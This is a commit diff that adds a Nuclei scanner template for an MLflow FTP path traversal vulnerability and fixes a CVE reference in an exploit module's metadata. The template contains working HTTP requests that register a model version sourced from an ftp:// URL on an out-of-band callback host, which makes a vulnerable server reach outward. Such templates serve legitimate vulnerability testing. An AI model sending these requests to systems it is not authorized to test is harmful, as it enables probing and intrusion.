Added mlflow URL parsing confusion Nuclei Template
- Fixed CVE Number in triton exploitmain
parent
7f4abdea5d
commit
7dd6ff71d7
|
@ -0,0 +1,41 @@
|
||||||
|
id: mlflow-url-parsing-confusion-lfi
|
||||||
|
info:
|
||||||
|
name: MLflow FTP Path Traversal
|
||||||
|
author: kevin-mizu, byt3bl33d3r
|
||||||
|
severity: high
|
||||||
|
description: An issue in MLflow's handling of FTP URLs allows for path traversal, enabling attackers to write files to arbitrary locations on the server.
|
||||||
|
reference: https://huntr.com/bounties/029a3824-cee3-4cf1-b260-7138aa539b85/
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
|
||||||
|
cvss-score: 9.3
|
||||||
|
cve-id: CVE-2023-6975
|
||||||
|
cwe-id: CWE-29
|
||||||
|
tags: mlflow,ml,cve,path-traversal
|
||||||
|
|
||||||
|
variables:
|
||||||
|
experiment_name: "{{rand_text_alpha(6)}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
|
{"name": "{{experiment_name}}"}
|
||||||
|
- |
|
||||||
|
POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
|
{"name": "{{experiment_name}}", "source": "ftp://{{interactsh-url}}/a"}
|
||||||
|
- |
|
||||||
|
GET /model-versions/get-artifact?path=random&name={{experiment_name}}&version=1 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol
|
||||||
|
words:
|
||||||
|
- "dns"
|
|
@ -38,7 +38,7 @@ metadata = {
|
||||||
'license': 'MSF_LICENSE',
|
'license': 'MSF_LICENSE',
|
||||||
'references': [
|
'references': [
|
||||||
{'type': 'url', 'ref': 'https://huntr.com/bounties/b27148e3-4da4-4e12-95ae-756d33d94687/'},
|
{'type': 'url', 'ref': 'https://huntr.com/bounties/b27148e3-4da4-4e12-95ae-756d33d94687/'},
|
||||||
{'type': 'cve', 'ref': 'CVE-2023-6025'}
|
{'type': 'cve', 'ref': 'CVE-2023-31036'}
|
||||||
],
|
],
|
||||||
'type': 'remote_exploit_cmd_stager',
|
'type': 'remote_exploit_cmd_stager',
|
||||||
'targets': [
|
'targets': [
|
||||||
|
|
Loading…
Reference in New Issue